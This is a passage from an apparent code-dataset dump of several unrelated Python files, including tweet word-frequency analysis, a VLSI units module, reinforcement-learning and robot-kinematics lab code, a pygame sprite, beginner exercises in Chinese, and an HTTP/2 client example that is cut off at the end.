Counter\nimport re\nimport numpy as np\nimport nltk\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords\nstemming = SnowballStemmer(\"spanish\")\nstops = set(stopwords.words('spanish'))\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nimport matplotlib.pyplot as plt\nimport seaborn as sn\n\n################################################# Definiciones #####################################################\ndef rowse(DataFrame):\n\treturn DataFrame.iloc[0:10048, 0]\ndef rowst(DataFrame):\n\treturn DataFrame.iloc[0:10048, 1]\n\ndef apply_cleaning_function_to_list(X):\n\tcleaned_X = []\n\tfor x in X:\n\t\tcleaned_X.append(clean_text(x))\n\treturn cleaned_X\ndef clean_text(raw_text):\n\ttext = raw_text.lower()\n\ttokens = nltk.word_tokenize(text)\n\ttoken_words = [w for w in tokens if w.isalpha()]\n\tpunct = [re.sub(r'[^\\w\\s]', '', w) for w in token_words if not w in stops]\n\t#stemmed_words = [stemming.stem(w) for w in punct]\n\t#meaningful_words = [w for w in stemmed_words if not w in stops]\n\t#joined_words = (' '.join(meaningful_words))\n\tjoined_words = (' '.join(punct))\n\treturn joined_words\n\ndef percent(x):\n\ty = ((x)*100)/10048\n\treturn float(\"{0:.2f}\".format(y))\n\n#################################################################################################################\n\nif __name__ == \"__main__\":\n\n\ttext1 = pd.read_csv('alegria_claudia_terminado.csv', names = ['Etiqueta1', 'Tweet1'])\n\ttext1['Tweet1'] = text1['Tweet1'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttext2 = pd.read_csv('alegria_tona_terminado.csv', names = 
['Etiqueta2', 'Tweet2'])\n\ttext2['Tweet2'] = text2['Tweet2'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttext3 = pd.read_csv('alegria_iris.csv', names = ['Etiqueta3', 'Tweet3'])\n\ttext3['Tweet3'] = text3['Tweet3'].replace('http\\S+', '', regex=True).replace(r'www\\S+', '', regex=True)\n\n\ttweets = pd.concat([rowst(text1), rowst(text2), rowst(text3)])\n\n\tetiquetas = pd.concat([rowse(text1), rowse(text2), rowse(text3)])\n\tetiquetas = etiquetas.replace(' N', 'N')\n\tetiquetas = etiquetas.replace('N ', 'N')\n\tetiquetas = etiquetas.replace('X', 'C')\n\tetiquetas = etiquetas.replace('V', 'C')\n\tetiquetas = etiquetas.replace('S', 'A')\n\tetiquetas = etiquetas.replace('D', 'A')\n\tetiquetas = etiquetas.replace('O', 'P')\n\tetiquetas = etiquetas.replace(' F', 'F')\n\tetiquetas = etiquetas.replace('C ', 'C')\n\tetiquetas = etiquetas.replace('Á', 'A')\n\n\tdata = pd.DataFrame({'et1': rowse(text1), 'et2': rowse(text2),\n\t\t'et3': rowse(text3) , 'twits': rowst(text1)})\n\tdata['et1'] = np.where(data['et1'] == 'Á', 'A', data['et1'])\n\tdata['et2'] = np.where(data['et2'] == 'X', 'C', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'V', 'C', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'S', 'A', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == 'D', 'A', data['et2'])\n\tdata['et2'] = np.where(data['et2'] == ' N', 'N', data['et2'])\n\tdata['et3'] = np.where(data['et3'] == 'N ', 'N', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'O', 'P', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == ' F', 'F', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'C ', 'C', data['et3'])\n\tdata['et3'] = np.where(data['et3'] == 'V', 'C', data['et3'])\n\n\tet1 = list(enumerate(data['et1']))\n\tet2 = list(enumerate(data['et2']))\n\tet3 = list(enumerate(data['et3']))\n\n\tatl2 = set(et1).intersection(et2).union(set(et1).intersection(et3)).union(set(et2).intersection(et3))\n\tex3 = set(et1).intersection(et2).intersection(set(et1).intersection(et3))\n\n\tunion = list(sorted(atl2.union(ex3)))\n\n\tindex = [x for x,y in et1]\n\tiunion = [x for x,y in union]\n\teunion = [y for x,y in union]\n\n\tetiq = pd.Series(eunion, index=iunion)\n\tdata['match'] = etiq.reindex()\n\tdata = data.fillna('NA')\n\n\n\t############################################################# CANTIDAD DE TUITS Y PORCENTAJES ############################################################################\n\n\tcant = list(data.groupby('match').twits.count().values)\n\tcateg = sorted(list(data.match.unique()))\n\tpercents = [percent(x) for x in cant]\n\t\n\tinfo = pd.DataFrame(data.groupby('match').twits.count())\n\tinfo['percent'] = percents\n\t\n\t#for x,y,z in zip(categ,cant,percents):\n\t\t#print('Categoría: {} cantidad de tuits: {} porcentaje: {}%'.format(x,y,z))\n\n\t############ Gráfica de barras\n\tfig = plt.figure(figsize=(8,6))\n\tbar = data.groupby('match').twits.count().plot.bar (ylim=0)\n\tplt.xlabel('Categorías') \n\tplt.ylabel('Cantidad de tuits')\n\tplt.grid(alpha=.5, linestyle='--')\n\tplt.show()\n\n\n\t########################################################### FRECUENCIA DE PALABRA EN CADA CATEGORÍA ######################################################################\n\n\ttext_to_clean = list(data['twits'])\n\tcleaned_text = apply_cleaning_function_to_list(text_to_clean)\n\tdata['cleaned'] = cleaned_text\n\tnew_data = pd.DataFrame({'text': data.cleaned, 'target': data.match})\n\tnew_data = new_data[new_data.target != 'NA'] \t#Se eliminan los que quedaron sin 
categoría\n\t#print(new_data)\n\n\tclasA = new_data[new_data.target == 'A']\n\tclasP = new_data[new_data.target == 'P']\n\tclasF = new_data[new_data.target == 'F']\n\tclasC = new_data[new_data.target == 'C']\n\tclasN = new_data[new_data.target == 'N']\n\t#print(new_data)\n\n\tcvec = CountVectorizer(analyzer = 'word')\n\tcvec.fit(new_data.text)\n\n\tclasA_matrix = cvec.transform(clasA.text)\n\tclasP_matrix = cvec.transform(clasP.text)\n\tclasF_matrix = cvec.transform(clasF.text)\n\tclasC_matrix = cvec.transform(clasC.text)\n\tclasN_matrix = cvec.transform(clasN.text)\n\n\tA_tf = np.sum(clasA_matrix,axis=0)\n\tP_tf = np.sum(clasP_matrix,axis=0)\n\tF_tf = np.sum(clasF_matrix,axis=0)\n\tC_tf = np.sum(clasC_matrix,axis=0)\n\tN_tf = np.sum(clasN_matrix,axis=0)\n\t\n\tcA = np.squeeze(np.asarray(A_tf))\n\tcP = np.squeeze(np.asarray(P_tf))\n\tcF = np.squeeze(np.asarray(F_tf))\n\tcC = np.squeeze(np.asarray(C_tf))\n\tcN = np.squeeze(np.asarray(N_tf))\n\t\n\tterm_freq_df = pd.DataFrame([cA,cP,cF,cC,cN],\n\t\tcolumns=cvec.get_feature_names()).transpose()\n\tterm_freq_df.columns = ['A','P','F','C','N']\n\tterm_freq_df['total'] = (term_freq_df['A'] + term_freq_df['P'] + term_freq_df['F']\n\t\t+ term_freq_df['C'] + term_freq_df['N'])\n\t#print(term_freq_df.sort_values(by='total', ascending=False))\n\t\n\n\t################# Frecuencia relativa\n\tfrec_rel = pd.DataFrame()\n\tfrec_rel['A'] = term_freq_df['A'].apply(lambda x: (x/40351)*100)\n\tfrec_rel['P'] = term_freq_df['P'].apply(lambda x: (x/8654)*100)\n\tfrec_rel['F'] = term_freq_df['F'].apply(lambda x: (x/4332)*100)\n\tfrec_rel['C'] = term_freq_df['C'].apply(lambda x: (x/21151)*100)\n\tfrec_rel['N'] = term_freq_df['N'].apply(lambda x: (x/9279)*100)\n\tfrec_rel['total'] = term_freq_df['total'].apply(lambda x: (x/97095)*100)\n\t#print(frec_rel.sort_values(by='total', ascending=False).head(20))\n\n\n","sub_path":"Frecuencias Relativas.py","file_name":"Frecuencias Relativas.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566728746","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# units.py\n# Unit classes/functions for hammer_vlsi.\n#\n# Copyright 2018 Edward Wang \n\nfrom abc import ABC, abstractmethod\n\n\nclass ValueWithUnit(ABC):\n \"\"\"Represents some particular value that has units (e.g. \"10 ns\", \"2000 um\", \"25 C\", etc).\n \"\"\"\n\n # From https://stackoverflow.com/a/10970888\n _prefix_table = {\n 'y': 1e-24, # yocto\n 'z': 1e-21, # zepto\n 'a': 1e-18, # atto\n 'f': 1e-15, # femto\n 'p': 1e-12, # pico\n 'n': 1e-9, # nano\n 'u': 1e-6, # micro\n 'm': 1e-3, # mili\n 'c': 1e-2, # centi\n 'd': 1e-1, # deci\n '': 1, # \n 'k': 1e3, # kilo\n 'M': 1e6, # mega\n 'G': 1e9, # giga\n 'T': 1e12, # tera\n 'P': 1e15, # peta\n 'E': 1e18, # exa\n 'Z': 1e21, # zetta\n 'Y': 1e24, # yotta\n }\n\n @property\n @abstractmethod\n def unit(self) -> str:\n \"\"\"Get the base unit for values (e.g. \"s\", \"m\", \"V\", etc).\n Meant to be overridden by subclasses.\"\"\"\n\n @property\n @abstractmethod\n def unit_type(self) -> str:\n \"\"\"Get the base unit type for values. (e.g. for \"s\", this would be \"time\")\n Meant to be overridden by subclasses.\"\"\"\n\n def __init__(self, value: str, default_prefix: str = 'n') -> None:\n \"\"\"Create a time value from parsing the given string.\n Default prefix: n- (e.g. 
\"ns\", \"nV\", etc)\n \"\"\"\n import re\n\n regex = r\"^([\\d.]+) *(.*){}$\".format(re.escape(self.unit))\n m = re.search(regex, value)\n if m is None:\n try:\n num = str(float(value))\n prefix = default_prefix\n except ValueError:\n raise ValueError(\"Malformed {type} value {value}\".format(type=self.unit_type, value=value))\n else:\n num = m.group(1)\n prefix = m.group(2)\n\n if num.count('.') > 1 or len(prefix) > 1:\n raise ValueError(\"Malformed {type} value {value}\".format(type=self.unit_type, value=value))\n\n if prefix not in self._prefix_table:\n raise ValueError(\"Bad prefix for {value}\".format(value=value))\n\n self._value = float(num) # type: float\n # Preserve the prefix too to preserve precision\n self._prefix = self._prefix_table[prefix] # type: float\n\n @property\n def value(self) -> float:\n \"\"\"Get the actual value of this value. (e.g. 10 ns -> 1e-9)\"\"\"\n return self._value * self._prefix\n\n def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:\n \"\"\"Get this value in the given prefix. e.g. \"ns\", \"mV\", etc.\n \"\"\"\n # e.g. extract \"n\" from \"ns\" or blank if it's blank (e.g. \"V\" -> \"\")\n letter_prefix = \"\"\n if prefix != self.unit:\n letter_prefix = \"\" if prefix == \"\" else prefix[0]\n\n retval = self._value * (self._prefix / self._prefix_table[letter_prefix])\n if round_zeroes:\n return round(retval, 2)\n else:\n return retval\n\n def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:\n \"\"\"Get this value in the given prefix but including the units.\n e.g. return \"5 ns\".\n\n :param prefix: Prefix for the resulting value - e.g. \"ns\".\n :param round_zeroes: True to round 1.00000001 etc to 1 within 2 decimal places.\n \"\"\"\n # %g removes trailing zeroes\n return \"%g\" % (self.value_in_units(prefix, round_zeroes)) + \" \" + prefix\n\n\nclass TimeValue(ValueWithUnit):\n \"\"\"Time value - e.g. \"4 ns\".\n Parses time values from strings.\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"s\"\n\n @property\n def unit_type(self) -> str:\n return \"time\"\n\n\nclass VoltageValue(ValueWithUnit):\n \"\"\"Voltage value - e.g. \"0.95 V\", \"950 mV\".\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"V\"\n\n @property\n def unit_type(self) -> str:\n return \"voltage\"\n\n\nclass TemperatureValue(ValueWithUnit):\n \"\"\"Temperature value in Celsius - e.g. 
\"25 C\", \"125 C\".\n Mainly used for specifying corners for MMMC.\n \"\"\"\n\n @property\n def unit(self) -> str:\n return \"C\"\n\n @property\n def unit_type(self) -> str:\n return \"voltage\"\n","sub_path":"src/hammer-vlsi/hammer_vlsi/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91445887","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom env import Env\nfrom Brain import NoisyQ\nimport numpy as np\nimport tensorflow as tf \nimport copy\n\n\ndef update():\n for episode in range(300):\n # initial observation\n s = 0\n E = Env()\n while True:\n # RL choose action based on observation\n action = RL.choose_action(s)\n # RL take action and get next observation and reward\n s_, reward, done = E.step(action)\n print(action, reward)\n # RL learn from this transition\n RL.learn(s, action, reward, s_)\n # swap observation\n s = s_\n # break while loop when end of this episode\n if done:\n #RL.epsilon += 0.001\n break\n if episode %10 == 0:\n RL.dump_model = copy.copy(RL.model)\n \n \n E = Env()\n print(\"---------------test---------------\")\n RL.m.bias_noisy = False\n RL.m.weight_noisy = False\n for i in range(E.final_step):\n q_table = RL.model.predict([i])\n E.step(np.argmax(q_table))\n print(np.argmax(q_table))\n print(E.score)\n\nif __name__ == \"__main__\":\n env = Env()\n RL = NoisyQ(actions=list(range(env.n_actions)))\n update()\n \n ","sub_path":"Reinforcement_Learning/MaximalCalculator/6_NoisyDenseDQN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341445873","text":"import numpy as np\n# import scipy as sp\n# from scipy import linalg\nimport math\nimport rospy\nfrom sensor_msgs.msg import JointState\n\nnp.set_printoptions(precision=4,suppress=True)\n\n#------------------------------------------------------- Prelab Functions ------\ndef skew_3d(omega):\n \"\"\"\n Converts a rotation vector in 3D to its corresponding skew-symmetric matrix.\n \n Args:\n omega - (3,) ndarray: the rotation vector\n \n Returns:\n omega_hat - (3,3) ndarray: the corresponding skew symmetric matrix\n \"\"\"\n if not omega.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n \n #YOUR CODE HERE\n omega_hat = np.array([ [ 0,-omega[2], omega[1] ],\n [ omega[2], 0, -omega[0] ],\n [-omega[1], omega[0], 0 ]])\n\n return omega_hat\n\ndef rotation_2d(theta):\n \"\"\"\n Computes a 2D rotation matrix given the angle of rotation.\n \n Args:\n theta: the angle of rotation\n \n Returns:\n rot - (3,3) ndarray: the resulting rotation matrix\n \"\"\"\n \n #YOUR CODE HERE\n rot = np.array([[math.cos(theta), -math.sin(theta)],\n [math.sin(theta), math.cos(theta)]])\n\n return rot\n\ndef rotation_3d(omega, theta):\n \"\"\"\n Computes a 3D rotation matrix given a rotation axis and angle of rotation.\n \n Args:\n omega - (3,) ndarray: the axis of rotation\n theta: the angle of rotation\n \n Returns:\n rot - (3,3) ndarray: the resulting rotation matrix\n \"\"\"\n if not omega.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n \n #YOUR CODE HERE\n w_hat = skew_3d(omega)\n w_mag = np.linalg.norm(omega)\n \n rot = np.eye(3) + w_hat/w_mag*math.sin(w_mag*theta) +\\\n np.dot(w_hat,w_hat)/np.dot(w_mag,w_mag)*(1-math.cos(w_mag*theta))\n\n return rot\n\ndef hat_2d(xi):\n \"\"\"\n Converts a 2D twist to its 
corresponding 3x3 matrix representation\n \n Args:\n xi - (3,) ndarray: the 2D twist\n \n Returns:\n xi_hat - (3,3) ndarray: the resulting 3x3 matrix\n \"\"\"\n if not xi.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n\n #YOUR CODE HERE\n xi_hat = np.array([[0 , -xi[2], xi[0]],\n [xi[2], 0, xi[1]],\n [0 , 0, 0]])\n\n \n return xi_hat\n\ndef hat_3d(xi):\n \"\"\"\n Converts a 3D twist to its corresponding 4x4 matrix representation\n \n Args:\n xi - (6,) ndarray: the 3D twist\n \n Returns:\n xi_hat - (4,4) ndarray: the corresponding 4x4 matrix\n \"\"\"\n if not xi.shape == (6,):\n raise TypeError('xi must be a 6-vector')\n\n #YOUR CODE HERE\n xi_hat = np.array([[ 0, -xi[5], xi[4], xi[0]],\n [ xi[5], 0, -xi[3], xi[1]],\n [-xi[4], xi[3], 0, xi[2]],\n [ 0, 0, 0, 0 ]])\n\n return xi_hat\n\ndef homog_2d(xi, theta):\n \"\"\"\n Computes a 3x3 homogeneous transformation matrix given a 2D twist and a \n joint displacement\n \n Args:\n xi - (3,) ndarray: the 2D twist\n theta: the joint displacement\n \n Returns:\n g - (3,3) ndarray: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape == (3,):\n raise TypeError('xi must be a 3-vector')\n\n #YOUR CODE HERE\n w_theta = xi[2]*theta\n R = rotation_2d(w_theta)\n p1 = np.array([[(1-math.cos(w_theta)), math.sin(w_theta)],\n [ -math.sin(w_theta), (1-math.cos(w_theta))]])\n p2 = np.array([[0,-1],\n [1, 0]])\n p3 = np.array([[xi[0]/xi[2]],\n [xi[1]/xi[2]]])\n p = np.dot(np.dot(p1,p2),p3)\n g = np.vstack((np.hstack((R ,p)),[0,0,1]))\n return g\n\n\ndef homog_3d(xi, theta):\n \"\"\"\n Computes a 4x4 homogeneous transformation matrix given a 3D twist and a \n joint displacement.\n \n Args:\n xi - (6,) ndarray: the 3D twist\n theta: the joint displacement\n\n Returns:\n g - (4,4) ndarary: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape == (6,):\n raise TypeError('xi must be a 6-vector')\n\n #YOUR CODE HERE\n omega = xi[3:]\n v = xi[:3]\n g1 = rotation_3d(omega, theta)\n w_mag = np.linalg.norm(omega)\n w_hat = skew_3d(omega)\n g2 = (1/(w_mag**2))*\\\n (np.dot((np.eye(3)-g1),(np.dot(w_hat,v.reshape(3,1))))+ \\\n np.dot(np.dot(omega.reshape(3,1),omega.reshape(3,1).T ),v.reshape(3,1))*theta)\n g3 = g2.reshape(3,1)\n g = np.vstack((np.hstack((g1, g3)),[0,0,0,1]))\n \n return g\n\ndef prod_exp(xi, theta):\n \"\"\"\n Computes the product of exponentials for a kinematic chain, given \n the twists and displacements for each joint.\n \n Args:\n xi - (6,N) ndarray: the twists for each joint\n theta - (N,) ndarray: the displacement of each joint\n \n Returns:\n g - (4,4) ndarray: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape[0] == 6:\n raise TypeError('xi must be a 6xN')\n\n #YOUR CODE HERE\n g = 1\n n = len(theta)\n for i in range(0,n):\n g = np.dot(g,homog_3d(xi[:,i], theta[i]))\n\n\n return g\n\n#--------------------------------------------------------- Task 1 ---------\ndef velocity(omega, q):\n \"\"\"\n Computes the velocity vector for a joint when given omega and q\n\n Args:\n omega - (3, 1) ndarray: vector for axis of rotation\n q - (3, 1) ndarray: vector for displacement in wider coordinate frame\n\n Returns:\n v - (3, 1) ndarray: the velocity vector\n \"\"\"\n\n v = np.cross(-omega, q)\n\n return v\n\n\ndef Twist(v, omega):\n \"\"\"\n Computes a twist with angle omega and velocity v\n\n Args:\n v - (3, 1) ndarray: vector for velocity\n omega - (3, 1) ndarray: vector for axis of rotation\n\n Returns:\n xi - (6, 1) ndarray: twist vector\n \"\"\"\n \n\n xi = np.hstack( (v , 
omega))\n \n return xi\n\n\n\ndef task1(theta):\n \"\"\"\n Computes the transformation matrix for baxter's arm given the joint angles\n for each joint\n\n Args:\n theta - (7, 1) ndarray: the displacement of each joint\n\n Returns:\n g - (4,4) ndarray: the resulting homogenous transformation matrix\n \"\"\"\n\n if not theta.shape == (7,):\n raise TypeError('theta must be 7x1')\n\n omega = np.array([ [-.0059,.0113,.9999],\n [-0.7077,0.7065,-0.0122],\n [.7065,.7077,-.0038],\n [-.7077,.7065,-.0122],\n [.7065,.7077,-.0038],\n [-.7077,.7065,-.0122],\n [.7065,.7077,-.0038], \n ])\n\n q = np.array([ [.0635,.2598,.1188],\n [0.1106, 0.3116,0.3885] ,\n [.1827,.3838,.3881],\n [.3682,.5684,.3181],\n [.4417,.6420,.3177],\n [.6332,.8337,.3067],\n [.7152,.9158,.3063],\n ])\n q_end = np.array([0.7957 , 0.9965, 0.3058])\n # xi = np.zeros(6, 7)\n # for i in range(0, len(theta)):\n # v = velocity(omega[i,:], q[i, :])\n # xi[:, i] = Twist(v, omega[i,:]).T\n\n xi = Twist(velocity(omega, q), omega).T\n g_initial = np.vstack((np.hstack((np.eye(3), q_end.reshape(3,1))),[0 ,0,0, 1]))\n\n g = np.dot(prod_exp(xi, theta),g_initial)\n\n return g\n\n\n#-------------------------------------------------- Task 2 -------------------\ndef callback(message):\n \"\"\"\n Plugs the joint angles into our simulator and prints\n \"\"\"\n\n position = message.position\n theta = np.array(np.hstack([position[4:6], position[2:4], position[6:9]]))\n g = task1(theta)\n print(g)\n\n\ndef listener():\n \"\"\"\n Creates a listener node that subscribes to the positions topic\n and plugs them into our joint simulator\n \"\"\"\n\n #Run this program as a new node in the ROS computation graph\n #called /listener_, where is a randomly generated numeric\n #string. This randomly generated name means we can start multiple\n #copies of this node without having multiple nodes with the same\n #name, which ROS doesn't allow.\n rospy.init_node('listener', anonymous=True)\n\n #Create a new instance of the rospy.Subscriber object which we can \n #use to receive messages of type std_msgs/String from the topic /chatter_talk.\n #Whenever a new message is received, the method callback() will be called\n #with the received message as its first argument.\n rospy.Subscriber(\"robot/joint_states\", JointState, callback)\n\n\n #Wait for messages to arrive on the subscribed topics, and exit the node\n #when it is killed with Ctrl+C\n rospy.spin()\n\n\n\n\n\n\n\n\n\n","sub_path":"lab6/src/lab6/src/kin_func_skeleton.py","file_name":"kin_func_skeleton.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265167870","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n \"\"\"class of bullet shoot by ship\"\"\"\n def __init__(self, ai_settings, screen, ship):\n \"\"\"create a bullet object on the ship position\"\"\"\n super().__init__()\n self.screen = screen\n\n # reate a bullet and set the right position\n self.rect = pygame.Rect(0,0,ai_settings.bullet_width,ai_settings.bullet_height)\n self.rect.centerx = ship.rect.centerx\n self.rect.top = ship.rect.top\n\n # store the position by float\n self.y = float(self.rect.y)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n def update(self):\n \"\"\"up the bullet\"\"\"\n #update the number storing the position\n self.y -= self.speed_factor\n # updete the position of bullet\n self.rect.y = self.y\n\n def draw_bullet(self):\n \"\"\"draw the bullet\"\"\"\n 
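# draw the bullet as a filled rectangle at its current position, in the color configured in ai_settings\n 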
pygame.draw.rect(self.screen,self.color, self.rect)\n","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594787465","text":"\n\n#calss header\nclass _INSENSATE():\n\tdef __init__(self,): \n\t\tself.name = \"INSENSATE\"\n\t\tself.definitions = [u'not aware of what you are doing or what is happening around you: ', u\"not feeling any sympathy for other people's suffering: \", u'having none of the characteristics of life that an animal or plant has: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_insensate.py","file_name":"_insensate.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455029805","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n第五章\r\n\"\"\"\r\n\r\n#%% 测试题 1\r\n# 1:字符串\r\n# 2:input('这是一条提示信息:')\r\n# 3:使用int强制转换\r\n# 4:使用float强制转换\r\n\r\n\r\n#%% 动手试一试 1\r\na='li'\r\nb='ji'\r\nprint(a+b)\r\n\r\n\r\n#%% 2\r\na=input('姓:')\r\nb=input('名:')\r\nprint(a+b)\r\n\r\n\r\n#%% 3\r\na1=float(input('长(米):'))\r\nb1=float(input('宽(米):'))\r\narea=a1*b1\r\nprint(area,'平方米',end='')\r\n\r\n\r\n#%% 4\r\na1=float(input('长(米):'))\r\nb1=float(input('宽(米):'))\r\narea=a1*b1\r\narea1=area*9\r\nmoney=area*20\r\nprint('总共需要多少地毯:'+str(area)+'平方米')\r\nprint('总共需要多少地毯:'+str(area1)+'平方英尺')\r\nprint('地毯总价格:'+str(money)+'元')\r\n\r\n\r\n#%% 5\r\na2=float(input('有多少个五分币:'))\r\nb2=float(input('有多少个二分币:'))\r\nc2=float(input('有多少个一分币:'))\r\nal=a2*5+b2*2+c2\r\nprint('总面值:'+str(al))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Hello World/Practice Problems/第5章.py","file_name":"第5章.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"115462162","text":"# -*- coding: utf-8 -*-\n\"\"\"\npost_request.py\n~~~~~~~~~~~~~~~\n\nA short example that demonstrates a client that makes POST requests to certain\nwebsites.\n\nThis example is intended to demonstrate how to handle uploading request bodies.\nIn this instance, a file will be uploaded. 
In order to handle arbitrary files,\nthis example also demonstrates how to obey HTTP/2 flow control rules.\n\nTakes one command-line argument: a path to a file in the filesystem to upload.\nIf none is present, uploads this file.\n\"\"\"\nfrom __future__ import print_function\nimport ntpath\n\nimport mimetypes\nimport os\nimport sys\nimport base64\nfrom urllib3.fields import RequestField\nfrom urllib3.filepost import encode_multipart_formdata\n\nfrom twisted.internet import reactor, defer\nfrom twisted.internet.endpoints import connectProtocol, SSL4ClientEndpoint\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.ssl import optionsForClientTLS\nfrom h2 import settings\nfrom h2.connection import H2Connection\nfrom h2.events import (\n ResponseReceived, DataReceived, StreamEnded, StreamReset, WindowUpdated,\n SettingsAcknowledged,PushedStreamReceived\n)\n\n\nAUTHORITY = u'localhost2'\nPATH = '/'\n\n\nclass H2Protocol(Protocol):\n def __init__(self, file_path):\n self.conn = H2Connection()\n self.known_proto = None\n self.request_made = False\n self.request_complete = False\n self.file_path = file_path\n self.flow_control_deferred = None\n self.fileobj = None\n self.file_size = None\n\n def connectionMade(self):\n \"\"\"\n Called by Twisted when the TCP connection is established. We can start\n sending some data now: we should open with the connection preamble.\n \"\"\"\n self.conn.initiate_connection()\n self.transport.write(self.conn.data_to_send())\n\n def dataReceived(self, data):\n \"\"\"\n Called by Twisted when data is received on the connection.\n\n We need to check a few things here. Firstly, we want to validate that\n we actually negotiated HTTP/2: if we didn't, we shouldn't proceed!\n\n Then, we want to pass the data to the protocol stack and check what\n events occurred.\n \"\"\"\n if not self.known_proto:\n self.known_proto = self.transport.negotiatedProtocol\n assert self.known_proto == b'h2'\n\n events = self.conn.receive_data(data)\n print(events)\n\n for event in events:\n if isinstance(event, ResponseReceived):\n print(event)\n self.handleResponse(event.headers)\n elif isinstance(event, DataReceived):\n print(event)\n self.handleData(event.data)\n elif isinstance(event, PushedStreamReceived):\n self.handlePushedStreamReceived(event)\n elif isinstance(event, StreamEnded):\n print(event)\n self.endStream()\n elif isinstance(event, SettingsAcknowledged):\n print(event)\n self.settingsAcked(event)\n elif isinstance(event, StreamReset):\n print(event)\n reactor.stop()\n raise RuntimeError(\"Stream reset: %d\" % event.error_code)\n\n data = self.conn.data_to_send()\n self.transport.write(data)\n\n def settingsAcked(self, event):\n \"\"\"\n Called when the remote party ACKs our settings. We send a SETTINGS\n frame as part of the preamble, so if we want to be\n if data: very polite we can\n wait until the ACK for that frame comes before we start sending our\n request.\n \"\"\"\n\n if not self.request_made:\n self.sendRequest()\n\n\n def handleResponse(self, response_headers):\n \"\"\"\n Handle the response by printing the response headers.\n \"\"\"\n for name, value in response_headers:\n # print(\"%s: %s\" % (name.decode('utf-8'), value.decode('utf-8')))\n print(\"%s: %s\" % (name, value))\n\n print(\"\")\n\n def handleData(self, data):\n \"\"\"\n We handle data that's received by just printing it.\n \"\"\"\n print(data, end='')\n\n def endStream(self):\n \"\"\"\n We call this when the stream is cleanly ended by the remote peer. 
That\n means that the response is complete.\n\n Because this code only makes a single HTTP/2 request, once we receive\n the complete response we can safely tear the connection down and stop\n the reactor. We do that as cleanly as possible.\n \"\"\"\n self.request_complete = True\n self.conn.close_connection()\n self.transport.write(self.conn.data_to_send())\n self.transport.loseConnection()\n\n def handlePushedStreamReceived(self, event):\n # print(event.pushed_stream_id)\n # print(event.parent_stream_id)\n # print(event.headers)\n # self.conn.prioritize(1)\n self.count = 0\n if self.count == 0:\n response_headers = [\n # (':method', 'GET'),\n # (':authority', AUTHORITY),\n # (':scheme', 'https'),\n # (':path', '/data/images/99f2374e-92cd-4082-86de-2627924e364fIMG_79011165386531.jpeg'),\n # ('user-agent', 'hyper-h2/1.0.0')\n ]\n self.conn.send_headers(event.pushed_stream_id, event.headers)\n self.count += 1\n return\n\n def connectionLost(self, reason=None):\n \"\"\"\n Called by Twisted when the connection is gone. Regardless of whether\n it was clean or not, we want to stop the reactor.\n \"\"\"\n if self.fileobj is not None:\n self.fileobj = None\n\n if reactor.running:\n reactor.stop()\n\n def sendRequest(self):\n \"\"\"\n Send the GET request.\n\n \"\"\"\n\n # Now we can build a header block.\n request_headers = [\n (':method', 'GET'),\n (':authority', AUTHORITY),\n (':scheme', 'https'),\n (':path', PATH),\n ('user-agent', 'hyper-h2/1.0.0')\n ]\n\n \n self.conn.send_headers(1, request_headers)\n self.request_made = True\n\n\ntry:\n filename = sys.argv[1]\nexcept IndexError:\n filename = __file__\n\noptions = optionsForClientTLS(\n hostname=AUTHORITY,\n acceptableProtocols=[b'h2'],\n)\n\nconnectProtocol(\n SSL4ClientEndpoint(reactor, AUTHORITY, 443, options),\n 